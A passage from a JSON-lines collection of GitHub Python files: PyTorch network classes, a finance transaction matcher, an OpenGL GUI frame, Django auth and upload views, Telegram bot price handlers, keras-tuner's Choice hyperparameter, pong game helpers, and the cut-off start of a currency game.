120)\r\n return self.fc_layers(x).squeeze()\r\n\r\n\r\nclass Cifar10(nn.Module):\r\n def __init__(self, n_out):\r\n super(Cifar10, self).__init__()\r\n\r\n layers = []\r\n layers.append(nn.Conv2d(3, 32, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(nn.MaxPool2d(kernel_size=2, stride=2))\r\n\r\n layers.append(nn.Conv2d(32, 64, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(nn.Conv2d(64, 64, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n # layers.append(nn.MaxPool2d(kernel_size=2,stride=2))\r\n\r\n # layers.append(MetaConv2d(16, 120, kernel_size=5))\r\n # layers.append(nn.ReLU(inplace=True))\r\n\r\n self.main = nn.Sequential(*layers)\r\n\r\n layers = []\r\n layers.append(nn.Linear(147456, 512))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(nn.Dropout(p=0.5))\r\n layers.append(nn.Linear(512, n_out))\r\n\r\n self.fc_layers = nn.Sequential(*layers)\r\n\r\n def forward(self, x):\r\n x = self.main(x)\r\n x = x.view(-1, 147456)\r\n return self.fc_layers(x).squeeze()\r\n\r\n\r\nclass Net(MetaModule):\r\n def __init__(self):\r\n super(Net, self).__init__()\r\n self.conv1 = MetaConv2d(3, 32, 5)\r\n self.conv2 = MetaConv2d(32, 64, 5)\r\n self.fc1 = nn.Linear(64 * 5 * 5, 512)\r\n self.drop = nn.Dropout(p=0.5)\r\n self.fc2 = nn.Linear(512, 10)\r\n # self.fc3=nn.Linear(84,10)\r\n\r\n def forward(self, x):\r\n x = F.max_pool2d(F.relu(self.conv1(x)), 2)\r\n x = F.max_pool2d(F.relu(self.conv2(x)), 2)\r\n x = x.view(-1, 64 * 5 * 5)\r\n x = F.relu(self.fc1(x))\r\n # x = F.relu(self.fc2(x))\r\n x = self.fc2(x)\r\n return x\r\n\r\n\r\nclass Meta_cifar10(MetaModule):\r\n def __init__(self):\r\n super(Meta_cifar10, self).__init__()\r\n self.conv1 = MetaConv2d(1, 1, 5)\r\n\r\n # self.fc3=nn.Linear(84,10)\r\n\r\n def forward(self, x):\r\n x = F.max_pool2d(F.relu(self.conv1(x)), 2)\r\n return x\r\n\r\n\r\nclass LeNet_original(MetaModule):\r\n def __init__(self, n_out):\r\n super(LeNet_original, self).__init__()\r\n\r\n layers = []\r\n layers.append(nn.Conv2d(1, 6, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(nn.MaxPool2d(kernel_size=2, stride=2))\r\n\r\n layers.append(nn.Conv2d(6, 16, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(nn.MaxPool2d(kernel_size=2, stride=2))\r\n\r\n layers.append(nn.Conv2d(16, 120, kernel_size=5))\r\n layers.append(nn.ReLU(inplace=True))\r\n\r\n self.main = nn.Sequential(*layers)\r\n\r\n layers = []\r\n layers.append(nn.Linear(120, 84))\r\n layers.append(nn.ReLU(inplace=True))\r\n layers.append(nn.Linear(84, n_out))\r\n\r\n self.fc_layers = nn.Sequential(*layers)\r\n\r\n def forward(self, x):\r\n x = self.main(x)\r\n x = x.view(-1, 120)\r\n return self.fc_layers(x).squeeze()\r\n\r\n\r\nif __name__=='__main__':\r\n model = Meta_cifar10()\r\n print(model.state_dict())","repo_name":"cyang-cityu/MetaCorrection","sub_path":"nets/meta_base.py","file_name":"meta_base.py","file_ext":"py","file_size_in_byte":12039,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"67"} +{"seq_id":"22422663541","text":"from ._ccore import Transaction as _Transaction\n\ndef txn_matches(txn, query):\n \"\"\"Return whether ``txn`` is matching ``query``.\n\n ``query`` is a ``dict`` of all criteria to look for (example: ``{'payee': 'Barber shop'}``.\n List of possible dict keys:\n\n * description\n * payee\n * checkno\n * memo\n * amount\n * account\n * group\n\n All of these queries are string-based, except ``amount``, which requires an\n :class:`.Amount`.\n\n Returns true if any criteria matches, false otherwise.\n \"\"\"\n query_description = query.get('description')\n if query_description is not None:\n if query_description in txn.description.lower():\n return True\n query_payee = query.get('payee')\n if query_payee is not None:\n if query_payee in txn.payee.lower():\n return True\n query_checkno = query.get('checkno')\n if query_checkno is not None:\n if query_checkno == txn.checkno.lower():\n return True\n query_memo = query.get('memo')\n if query_memo is not None:\n for split in txn.splits:\n if query_memo in split.memo.lower():\n return True\n query_amount = query.get('amount')\n if query_amount is not None:\n query_value = float(query_amount) if query_amount else 0\n for split in txn.splits:\n split_value = float(split.amount) if split.amount else 0\n if query_value == abs(split_value):\n return True\n query_account = query.get('account')\n if query_account is not None:\n for split in txn.splits:\n if split.account and split.account.name.lower() in query_account:\n return True\n query_group = query.get('group')\n if query_group is not None:\n for split in txn.splits:\n if split.account and split.account.groupname and \\\n split.account.groupname.lower() in query_group:\n return True\n return False\n\ndef splitted_splits(splits):\n \"\"\"Returns `splits` separated in two groups (\"froms\" and \"tos\").\n\n \"froms\" are splits with a negative amount and \"tos\", the positive ones. Null splits are\n generally sent to the \"froms\" side, unless \"tos\" is empty.\n\n Returns ``(froms, tos)``.\n \"\"\"\n null_amounts = [s for s in splits if s.amount == 0]\n froms = [s for s in splits if s.amount < 0]\n tos = [s for s in splits if s.amount > 0]\n if not tos and null_amounts:\n tos.append(null_amounts.pop())\n froms += null_amounts\n return froms, tos\n\ndef Transaction(date, description=None, payee=None, checkno=None, account=None, amount=None):\n return _Transaction(1, date, description, payee, checkno, account, amount)\n","repo_name":"sebkoller/moneyguru","sub_path":"core/model/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"40163280788","text":"from bgl import *\r\nfrom .widget import *\r\nfrom math import cos, sin\r\n# 2x2 alternating block, starting with empty\r\npat = [ 51,51,51,51,\r\n\t\t51,51,51,51,\r\n\t\t204,204,204,204,\r\n\t\t204,204,204,204,\r\n\t\t51,51,51,51,\r\n\t\t51,51,51,51,\r\n\t\t204,204,204,204,\r\n\t\t204,204,204,204,\r\n\t\t51,51,51,51,\r\n\t\t51,51,51,51,\r\n\t\t204,204,204,204,\r\n\t\t204,204,204,204,\r\n\t\t51,51,51,51,\r\n\t\t51,51,51,51,\r\n\t\t204,204,204,204,\r\n\t\t204,204,204,204,\r\n\t\t51,51,51,51,\r\n\t\t51,51,51,51,\r\n\t\t204,204,204,204,\r\n\t\t204,204,204,204,\r\n\t\t51,51,51,51,\r\n\t\t51,51,51,51,\r\n\t\t204,204,204,204,\r\n\t\t204,204,204,204,\r\n\t\t51,51,51,51,\r\n\t\t51,51,51,51,\r\n\t\t204,204,204,204,\r\n\t\t204,204,204,204,\r\n\t\t51,51,51,51,\r\n\t\t51,51,51,51,\r\n\t\t204,204,204,204,\r\n\t\t204,204,204,204,]\r\n\r\n\r\nclass Frame(Widget):\r\n\t\"\"\"Frame for storing other widgets\"\"\"\r\n\ttheme_section = 'Frame'\r\n\ttheme_options = {'Color1': (1, 1, 1, 1),\r\n\t\t\t\t\t 'Color2': (0, 0, 1, 1),\r\n\t\t\t\t\t 'Color3': (0, 0, 1, 1),\r\n\t\t\t\t\t 'Color4': (0, 0, 1, 1),\r\n\t\t\t\t\t 'BorderSize': 0,\r\n\t\t\t\t\t 'BorderColor': (0, 0, 0, 1)\r\n\t\t\t\t}\r\n\r\n\tdef __init__(self, parent, name, border=None, size=[1, 1], pos=[0,0],offset=[0,0],\r\n\t\t\t\tsub_theme='', padding = 0, radius = 0, stipple = False, options=BGUI_NONE):\r\n\t\t\"\"\"\r\n\t\t:param parent: the widget's parent\r\n\t\t:param name: the name of the widget\r\n\t\t:param border: the size of the border around the frame (0 for no border)\r\n\t\t:param size: a tuple containing the width and height\r\n\t\t:param pos: a tuple containing the x and y position\r\n\t\t:param sub_theme: name of a sub_theme defined in the theme file (similar to CSS classes)\r\n\t\t:param options: various other options\r\n\r\n\t\t\"\"\"\r\n\t\tself.padding = padding\r\n\t\tself.stipple = stipple\r\n\t\tself.radius = radius\r\n\r\n\t\tWidget.__init__(self, parent, name, size, pos, offset, sub_theme, options)\r\n\r\n\t\tself._colors = [\r\n\t\t\t\tself.theme['Color1'],\r\n\t\t\t\tself.theme['Color2'],\r\n\t\t\t\tself.theme['Color3'],\r\n\t\t\t\tself.theme['Color4']\r\n\t\t\t\t]\r\n\r\n\t\tself.border_color = self.theme['BorderColor']\r\n\r\n\t\tif border is not None:\r\n\t\t\tself._border = border\r\n\t\telse:\r\n\t\t\tself._border = self.theme['BorderSize']\r\n\r\n\r\n\t@property\r\n\tdef colors(self):\r\n\t\t\"\"\"The colors for the four corners of the frame.\"\"\"\r\n\t\treturn self._colors\r\n\r\n\t@colors.setter\r\n\tdef colors(self, value):\r\n\t\tself._colors = value\r\n\r\n\t@property\r\n\tdef border(self):\r\n\t\t\"\"\"The size of the border around the frame.\"\"\"\r\n\t\treturn self._border\r\n\r\n\t@border.setter\r\n\tdef border(self, value):\r\n\t\tself._border = value\r\n\r\n\r\n\r\n\r\n\tdef _draw(self):\r\n\t\t\"\"\"Draw the frame\"\"\"\r\n\r\n\t\tdef drawRoundedRectangle(x, y, w, h, radius, color, res = 8, line = False):\r\n\t\t\tM_PI = 3.141592653589793238462643383279502\r\n\r\n\t\t\tglColor4f(*color)\r\n\t\t\tif line:\r\n\t\t\t\tglBegin(GL_LINE_STRIP)\r\n\t\t\telse:\r\n\t\t\t\tglBegin(GL_POLYGON)\r\n\t\t\tglVertex2f(x+radius,y)\r\n\t\t\tglVertex2f(x+w-radius,y)\r\n\t\t\ti = M_PI*1.5\r\n\t\t\twhile i < M_PI*2.0:\r\n\t\t\t\ti += M_PI / res\r\n\t\t\t\tglVertex2f(x+w-radius+cos(i)*radius,y+radius+sin(i)*radius)\r\n\t\t\tglVertex2f(x+w,y+radius)\r\n\t\t\tglVertex2f(x+w,y+h-radius)\r\n\t\t\ti = 0\r\n\t\t\twhile i < M_PI*0.5:\r\n\t\t\t\ti += M_PI / res\r\n\t\t\t\tglVertex2f(x+w-radius+cos(i)*radius,y+h-radius+sin(i)*radius)\r\n\t\t\tglVertex2f(x+w-radius,y+h)\r\n\t\t\tglVertex2f(x+radius,y+h)\r\n\t\t\ti = M_PI*0.5\r\n\t\t\twhile i < M_PI:\r\n\t\t\t\ti += M_PI / res\r\n\t\t\t\tglVertex2f(x+radius+cos(i)*radius,y+h-radius+sin(i)*radius)\r\n\t\t\tglVertex2f(x,y+h-radius)\r\n\t\t\tglVertex2f(x,y+radius)\r\n\t\t\ti = M_PI\r\n\t\t\twhile i < M_PI*1.5:\r\n\t\t\t\ti += M_PI / res\r\n\t\t\t\tglVertex2f(x+radius+cos(i)*radius,y+radius+sin(i)*radius)\r\n\t\t\tglEnd()\r\n\r\n\r\n\t\t# Enable alpha blending\r\n\t\tglEnable(GL_BLEND)\r\n\t\tglBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\r\n\r\n\t\t# Enable polygon offset\r\n\t\tglEnable(GL_POLYGON_OFFSET_FILL)\r\n\t\tglPolygonOffset(1.0, 1.0)\r\n\r\n\t\tpadx = [self.padding, -self.padding, -self.padding, self.padding]\r\n\t\tpady = [self.padding, self.padding, -self.padding, -self.padding]\r\n\r\n\r\n\t\tif self.stipple:\r\n\t\t\tstipplePattern = Buffer(GL_BYTE, 4*32, pat)\r\n\t\t\tglEnable(GL_POLYGON_STIPPLE)\r\n\t\t\tglPolygonStipple(stipplePattern)\r\n\r\n\t\tif self.radius:\r\n\t\t\tw = self.gl_position[1][0] - self.gl_position[0][0]\r\n\t\t\th = self.gl_position[2][1] - self.gl_position[1][1]\r\n\t\t\tdrawRoundedRectangle(self.gl_position[0][0], self.gl_position[0][1], w, h, self.radius, self.colors[0])\r\n\t\t\tif self.border:\r\n\t\t\t\tglLineWidth(self.border)\r\n\t\t\t\tdrawRoundedRectangle(self.gl_position[0][0], self.gl_position[0][1], w, h, self.radius, self.border_color, line = True)\r\n\t\t\t\tglLineWidth(1.0)\r\n\t\telse:\r\n\t\t\tglBegin(GL_QUADS)\r\n\t\t\tfor i in range(4):\r\n\t\t\t\tglColor4f(self.colors[i][0], self.colors[i][1], self.colors[i][2], self.colors[i][3])\r\n\t\t\t\tglVertex2f(self.gl_position[i][0]+padx[i], self.gl_position[i][1]+pady[i])\r\n\t\t\tglEnd()\r\n\r\n\t\tif self.stipple:\r\n\t\t\tglDisable(GL_POLYGON_STIPPLE)\r\n\r\n\t\tglDisable(GL_POLYGON_OFFSET_FILL)\r\n\r\n\t\t# Draw an outline\r\n\t\tif self.border > 0 and not self.radius:\r\n\t\t\tr, g, b, a = self.border_color\r\n\t\t\tglColor4f(r, g, b, a)\r\n\t\t\tglPolygonMode(GL_FRONT, GL_LINE)\r\n\t\t\tglLineWidth(self.border)\r\n\r\n\t\t\tglBegin(GL_QUADS)\r\n\t\t\tfor i in range(4):\r\n\t\t\t\tglVertex2f(self.gl_position[i][0], self.gl_position[i][1])\r\n\r\n\t\t\tglEnd()\r\n\r\n\t\t\tglLineWidth(1.0)\r\n\t\t\tglPolygonMode(GL_FRONT, GL_FILL)\r\n\r\n\t\tglDisable(GL_BLEND)\r\n\t\tWidget._draw(self)\r\n\r\n","repo_name":"MolecularFlipbook/FlipbookApp","sub_path":"mfb/ge/bgui/frame.py","file_name":"frame.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"67"} +{"seq_id":"22784336589","text":"# coding: utf-8\n\"\"\"browser.py -- Browser window in visualizer application\n\"\"\"\nfrom logging import debug\n\nimport wx\nfrom ec4vis import *\n\nfrom render_window import RenderWindowPanel\nfrom control_panel import ControlPanel\nfrom menu_bar import AppMenuBar\n \n\nclass BrowserFrame(wx.Frame):\n \"\"\"Browser window.\n \"\"\"\n def __init__(self, *args, **kwargs):\n \"\"\"Initializer.\n \"\"\"\n wx.Frame.__init__(self, *args, **kwargs)\n # render window\n render_window_panel = RenderWindowPanel(self, -1)\n # control panel\n control_panel = ControlPanel(self, -1)\n # menu\n menu_bar = AppMenuBar(self)\n # bindings\n self.render_window_panel = render_window_panel\n self.control_panel = control_panel\n self.menu_bar = menu_bar\n # sizer\n root_sizer = wx.BoxSizer(wx.HORIZONTAL)\n root_sizer.Add(render_window_panel, 1, wx.ALL|wx.EXPAND, 0)\n root_sizer.Add(control_panel, 0, wx.ALL|wx.EXPAND, 0)\n self.SetSizer(root_sizer)\n self.Layout()\n\n\nif __name__=='__main__':\n class App(wx.App):\n \"\"\"Demonstrative application.\n \"\"\"\n def OnInit(self):\n \"\"\"Initializer.\n \"\"\"\n frame = BrowserFrame(None, -1, u'Browser Frame Demo')\n frame.Show(True)\n self.SetTopWindow(frame)\n return True\n app = App(0)\n app.MainLoop()\n","repo_name":"ecell/newio","sub_path":"ec4vis/ec4vis/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"7872800406","text":"from django.shortcuts import render, get_object_or_404\nfrom django.contrib.auth import get_user_model\nfrom rest_framework import generics, permissions, viewsets\nfrom rest_framework_simplejwt.views import TokenObtainPairView\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\n\nfrom .serializers import LogInSerializer, UserSerializer, ProfileSerializer\nfrom .models import Upload, UploadPrivate\n\n\n\n\nclass SignUpView(generics.CreateAPIView):\n queryset = get_user_model().objects.all()\n serializer_class = UserSerializer\n\nclass LogInView(TokenObtainPairView):\n serializer_class = LogInSerializer\n\nclass ProfileView(generics.RetrieveUpdateAPIView):\n permission_classes = (permissions.IsAuthenticated,)\n serializer_class = ProfileSerializer\n\n def get_queryset(self):\n return get_user_model().objects.filter(username=self.request.user.username)\n \n def get_object(self):\n queryset = self.get_queryset()\n obj = get_object_or_404(queryset)\n return obj\n \n\ndef image_upload(request):\n if request.method == 'POST':\n image_file = request.FILES['image_file']\n image_type = request.POST['image_type']\n if settings.USE_S3:\n if image_type == 'private':\n upload = UploadPrivate(file=image_file)\n else:\n upload = Upload(file=image_file)\n upload.save()\n image_url = upload.file.url\n else:\n fs = FileSystemStorage()\n filename = fs.save(image_file.name, image_file)\n image_url = fs.url(filename)\n return render(request, 'upload.html', {\n 'image_url': image_url\n })\n return render(request, 'upload.html')\n","repo_name":"alaeddine-13/taxim","sub_path":"server/taxi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38051531122","text":"import logging\n\nfrom aiogram import types, Dispatcher\nfrom aiogram.dispatcher.filters import Text\nfrom loguru import logger\n\nfrom config import web_buttons, OWNER\nfrom create_bot import bot\n\n\nasync def web_lab(message: types.Message):\n try:\n owner: types.ChatMember = await bot.get_chat_member(OWNER, OWNER)\n await message.answer(\n 'Хей. А ось і прайс лист для Вашої Лабораторної роботи, будем раді вашому замовлені ^^\\n\\n'\n 'Вся Лабораторна - 800грн\\n\\n'\n f'Якщо вас цікавить тільки якась частина, тоді пишить - {owner.user.mention} (для замовлення також)'\n )\n except Exception as e:\n logger.exception(e)\n\n\nasync def web_pract(message: types.Message):\n try:\n owner: types.ChatMember = await bot.get_chat_member(OWNER, OWNER)\n await message.answer(\n 'Хей. А ось і прайс лист для Вашої Практичної роботи, будем раді вашому замовлені ^^\\n\\n'\n ''\n 'Лабораторна №1 - 150грн\\n'\n 'Лабораторна №2 - 150грн\\n'\n 'Лабораторна №3 - 200грн\\n'\n 'Лабораторна №4 - 150грн\\n'\n 'Лабораторна №5 - 200грн\\n'\n 'Лабораторна №6 - 250грн\\n'\n 'Лабораторна №7 - 400грн\\n'\n 'Лабораторна №8 - 350грн\\n'\n 'Лабораторна №9 - 400грн'\n '\\n\\n'\n f'Для замовлення пишить - {owner.user.mention}'\n )\n except Exception as e:\n logger.exception(e)\n\n\ndef register_message_handler_web(dp: Dispatcher):\n dp.register_message_handler(\n web_lab,\n Text(equals=web_buttons[0])\n )\n\n dp.register_message_handler(\n web_pract,\n Text(equals=web_buttons[1])\n )\n","repo_name":"zakharfsk/eazylab_bot","sub_path":"handlers/handler_price_web.py","file_name":"handler_price_web.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5866888999","text":"import six\n\nfrom keras_tuner import protos\nfrom keras_tuner.api_export import keras_tuner_export\nfrom keras_tuner.engine import conditions as conditions_mod\nfrom keras_tuner.engine.hyperparameters import hp_utils\nfrom keras_tuner.engine.hyperparameters import hyperparameter\n\n\n@keras_tuner_export(\"keras_tuner.engine.hyperparameters.Choice\")\nclass Choice(hyperparameter.HyperParameter):\n \"\"\"Choice of one value among a predefined set of possible values.\n\n Args:\n name: A string. the name of parameter. Must be unique for each\n `HyperParameter` instance in the search space.\n values: A list of possible values. Values must be int, float,\n str, or bool. All values must be of the same type.\n ordered: Optional boolean, whether the values passed should be\n considered to have an ordering. Defaults to `True` for float/int\n values. Must be `False` for any other values.\n default: Optional default value to return for the parameter.\n If unspecified, the default value will be:\n - None if None is one of the choices in `values`\n - The first entry in `values` otherwise.\n \"\"\"\n\n def __init__(self, name, values, ordered=None, default=None, **kwargs):\n super().__init__(name=name, default=default, **kwargs)\n if not values:\n raise ValueError(\"`values` must be provided for `Choice`.\")\n\n # Type checking.\n types = {type(v) for v in values}\n if len(types) > 1:\n raise TypeError(\n \"A `Choice` can contain only one type of value, \"\n f\"found values: {str(values)} with types {types}.\"\n )\n\n # Standardize on str, int, float, bool.\n if isinstance(values[0], six.string_types):\n values = [str(v) for v in values]\n if default is not None:\n default = str(default)\n elif isinstance(values[0], six.integer_types):\n values = [int(v) for v in values]\n if default is not None:\n default = int(default)\n elif not isinstance(values[0], (bool, float)):\n raise TypeError(\n \"A `Choice` can contain only `int`, `float`, `str`, or \"\n \"`bool`, found values: \" + str(values) + \"with \"\n \"types: \" + str(type(values[0]))\n )\n self._values = values\n\n if default is not None and default not in values:\n raise ValueError(\n \"The default value should be one of the choices. \"\n f\"You passed: values={values}, default={default}\"\n )\n self._default = default\n\n # Get or infer ordered.\n self.ordered = ordered\n is_numeric = isinstance(values[0], (six.integer_types, float))\n if self.ordered and not is_numeric:\n raise ValueError(\"`ordered` must be `False` for non-numeric types.\")\n if self.ordered is None:\n self.ordered = is_numeric\n\n def __repr__(self):\n return (\n f\"Choice(name: '{self.name}', \"\n + f\"values: {self._values}, \"\n + f\"ordered: {self.ordered}, default: {self.default})\"\n )\n\n @property\n def values(self):\n return self._values\n\n @property\n def default(self):\n return self._values[0] if self._default is None else self._default\n\n def prob_to_value(self, prob):\n return self._values[hp_utils.prob_to_index(prob, len(self._values))]\n\n def value_to_prob(self, value):\n return hp_utils.index_to_prob(\n self._values.index(value), len(self._values)\n )\n\n def get_config(self):\n config = super().get_config()\n config[\"values\"] = self._values\n config[\"ordered\"] = self.ordered\n return config\n\n @classmethod\n def from_proto(cls, proto):\n values = [getattr(val, val.WhichOneof(\"kind\")) for val in proto.values]\n default = getattr(proto.default, proto.default.WhichOneof(\"kind\"), None)\n conditions = [\n conditions_mod.Condition.from_proto(c) for c in proto.conditions\n ]\n return cls(\n name=proto.name,\n values=values,\n ordered=proto.ordered,\n default=default,\n conditions=conditions,\n )\n\n def to_proto(self):\n if isinstance(self.values[0], six.string_types):\n values = [\n protos.get_proto().Value(string_value=v) for v in self.values\n ]\n default = protos.get_proto().Value(string_value=self.default)\n elif isinstance(self.values[0], six.integer_types):\n values = [\n protos.get_proto().Value(int_value=v) for v in self.values\n ]\n default = protos.get_proto().Value(int_value=self.default)\n else:\n values = [\n protos.get_proto().Value(float_value=v) for v in self.values\n ]\n default = protos.get_proto().Value(float_value=self.default)\n return protos.get_proto().Choice(\n name=self.name,\n ordered=self.ordered,\n values=values,\n default=default,\n conditions=[c.to_proto() for c in self.conditions],\n )\n","repo_name":"keras-team/keras-tuner","sub_path":"keras_tuner/engine/hyperparameters/hp_types/choice_hp.py","file_name":"choice_hp.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","stars":2783,"dataset":"github-code","pt":"67"} +{"seq_id":"1819329391","text":"# Import required packages\nimport random\nimport pygame\n\n# Import Parameters\nimport pygame.time\n\nfrom parameters import *\n\n\n# Define collision function\ndef collision(left_paddle, right_paddle, ball):\n '''\n ball (Ball): The ball object of class Ball\n left_paddle (PaddleLeft): The left paddle object of class Paddle\n right_paddle (PaddleRigth): The right paddle object of class Paddle\n\n Returns:\n Boolean value for collision\n '''\n\n # Define object position\n ball_position = ball.get_position()\n ball_radius = ball.get_size()\n pl_top_position = left_paddle.top_right[1]\n pl_down_position = left_paddle.down_right[1]\n pl_right_position = left_paddle.down_right[0]\n pr_top_position = right_paddle.top_left[1]\n pr_down_position = right_paddle.down_left[1]\n pr_left_position = right_paddle.down_left[0]\n\n # Return True if collision has occured\n if ball_position[0] - ball_radius <= pl_right_position and \\\n pl_down_position <= ball_position[1] <= pl_top_position:\n return True\n\n # Return True if collision has occured\n if ball_position[0] + ball_radius >= pr_left_position and \\\n pr_down_position <= ball_position[1] <= pr_top_position:\n return True\n\n # Return False otherwise\n else:\n return False\n\n\n# Define a function to control movement of ball\ndef ball_movement(\n x_direction, y_direction, ball, score, left_paddle, right_paddle, score_time,\n pong_sound, win_sound, loss_sound, goal_sound, edge_sound):\n '''\n x_direction (int): Integer defining the movement direction on x axis\n y_direction (int): Integer defining the movement direction on y axis\n height (int): Defines the height of the playing window\n width (int): Defines the width of the playing window\n ball (Ball): The ball object of class Ball\n score (list): A list with two elements, the score of left and right players\n left_paddle (PaddleLeft): The left paddle object of class Paddle\n right_paddle (PaddleRight): The right paddle object of class Paddle\n score_time (double or None): Time when last goal was scored\n pong_sound (WAV): Sound when ball hits paddle\n win_sound (WAV): Sound when player wins\n loss_sound(WAV): Sound when player loses\n goal_sound(WAV): Sound when goal is scored\n edge_sound(WAV): Sound when upper or lower edge is hit\n\n Returns:\n y_direction (int): Movement direction on y-axis after checking all conditions\n x_direction (int): Movement direction on x-axis after checking all conditions\n score (list): Contains the scores of each player\n score_time (double or None): Time when last goal was scored. \n '''\n\n # New Ball position\n ball.set_position(x_direction, y_direction)\n\n # If ball touches upper edge\n if ball.get_position()[1] + ball.get_size() > HEIGHT:\n # edge sound\n pygame.mixer.Sound.play(edge_sound)\n # invert y movement\n y_direction = y_direction * -1\n return x_direction, y_direction, score, score_time\n\n # If ball touches lower edge\n elif ball.get_position()[1] - ball.get_size() < 0:\n # edge sound\n pygame.mixer.Sound.play(edge_sound)\n # invert y movement\n y_direction = y_direction * -1\n return x_direction, y_direction, score, score_time\n\n # If player scores\n elif ball.get_position()[0] - ball.get_size() > WIDTH:\n # Increase score of right player\n score[0] += 1\n # Play sound for goal\n if score[0] != POINTS_TO_WIN:\n pygame.mixer.Sound.play(goal_sound)\n # Play different sound if goal means loss\n if score[0] == POINTS_TO_WIN:\n pygame.mixer.Sound.play(win_sound)\n # get score time\n score_time = pygame.time.get_ticks()\n x_direction = random.sample([1, -1], 1)[0] * 1.5 # Horizontal movement (left or right)\n y_direction = random.sample([random.uniform(-1, -0.5), random.uniform(0.5, 1)], 1)[0] * 1.5 # Vertical movement (down or up)\n\n return x_direction, y_direction, score, score_time\n\n # If player gets scored on\n elif ball.get_position()[0] + ball.get_size() < 0:\n # Increase score of right player\n score[1] += 1\n # Play sound for goal\n if score[1] != POINTS_TO_WIN:\n pygame.mixer.Sound.play(goal_sound)\n # Play sound if goal means loss\n if score[1] == POINTS_TO_WIN:\n pygame.mixer.Sound.play(loss_sound)\n # get score time\n score_time = pygame.time.get_ticks()\n x_direction = random.sample([1, -1], 1)[0] * 1.5 # Horizontal movement (left or right)\n y_direction = random.sample([random.uniform(-1, -0.5), random.uniform(0.5, 1)], 1)[0] * 1.5 # Vertical movement (down or up)\n\n return x_direction, y_direction, score, score_time\n\n # If ball touches a paddle\n elif collision(left_paddle, right_paddle, ball):\n\n # If ball speed is still below maximal speed\n if abs(x_direction) < 5:\n\n # invert x movement with multiplier\n x_direction = x_direction * -1.25\n y_direction = y_direction * 1.25\n\n\n # If ball speed is above maximal speed\n elif abs(x_direction) > 5:\n\n # invert x movement without multiplier\n x_direction = x_direction * -1\n y_direction = y_direction * 1\n\n ball.set_color(random.sample(range(0, 256, 1), 3))\n left_paddle.set_color(random.sample(range(0, 256, 1), 3))\n right_paddle.set_color(random.sample(range(0, 256, 1), 3))\n pygame.mixer.Sound.play(pong_sound)\n return x_direction, y_direction, score, score_time\n\n # If nothing of the above happens\n else:\n return x_direction, y_direction, score, score_time\n\n\n# Define a function to control movement of paddle\ndef paddle_movement(command, height, paddle):\n '''\n command (int): Integer defining the movement direction on x axis\n height (int): Defines the height of the playing window\n paddle (Paddle): The paddle object of class Paddle\n\n Returns:\n command (int): Integer defining the movement after command was executed\n '''\n\n # New Paddle Position\n paddle.set_position(command)\n\n # get height of top left corner\n top_left_height = paddle.get_polygon()[0][1]\n\n # get height of down left corner\n down_left_height = paddle.get_polygon()[3][1]\n\n # Stop upward movement when upper edge is touched\n if top_left_height == height:\n command = 0\n\n # Stop upward movement when upper edge is touched\n if down_left_height == 0:\n command = 0\n\n return command\n\n\n# Create an AI to decide on how to move the paddle\ndef ai_movement(right_paddle, ball, x_direction, y_direction, difficulty):\n '''\n right_paddle (PaddleRight): Right paddle Object\n ball (Ball): Ball object\n x_direction (int): Integer defining the movement direction of the ball on x axis\n y_direction (int): Integer defining the movement direction of the ball on y axis\n difficulty (int): Integer defining the opponent difficulty\n\n Returns:\n ai_command (int): Command of AI to move paddle up or down\n '''\n\n # If ball is moving to the right\n if x_direction > 0:\n\n # Get current ball position\n position = ball.get_position()\n\n # Calculate final contact point of ball with right edge\n contact_point = position[1] + (y_direction / x_direction) * (WIDTH - position[0])\n\n # Add random movement to AI to prevent it from being to strong\n contact_point += random.normalvariate(0, difficulty)\n\n # If y position of paddle to high\n if right_paddle.position[1] > contact_point:\n ai_command = -3\n\n # If y position of paddle to low\n elif right_paddle.position[1] < contact_point:\n ai_command = 3\n\n # If position correct\n else:\n ai_command = 0\n\n # If ball is moving to the left\n if x_direction < 0:\n ai_command = 0\n\n return ai_command\n\n# Print Messages to screen\ndef write_message(screen, text, size, hposition, color):\n '''\n size (int): Size of message to be written\n hposition (int): Horizontal position of message\n text (string): Text to be depicted in message\n color (tuple): RGB code\n\n Returns:\n image with message on top of screen\n '''\n\n # Print Message\n message_font = pygame.font.SysFont(\"Comic Sans MS\", size)\n message = message_font.render(text, 1, color)\n message_rect = message.get_rect()\n message_rect.center = (WIDTH / 2, HEIGHT / 2 + hposition)\n screen.blit(message, message_rect)\n\n","repo_name":"FStiffler/Pong-Game","sub_path":"pong_game/helperFunctions.py","file_name":"helperFunctions.py","file_ext":"py","file_size_in_byte":8631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39030266098","text":"import requests\nimport json\nimport random\nfrom currency_converter import CurrencyConverter\nfrom Utils import Screen_cleaner\nfrom time import sleep\n\n# This game will use the free currency api to get the current exchange rate from USD to ILS,\n# will generate a new random number between 1-100\n# and wiil ask the user what he thinks is the value of the generated number from USD to ILS,\n# depending on the user's difficulty his answer will be correct\n# if the guessed value is between the interval surrounding the correct answer\n\n\ndef currency_rate(number):\n url = f\"https://api.apilayer.com/currency_data/convert?to=ils&from=usd&amount={number}\"\n payload = {}\n headers = {\"apikey\": 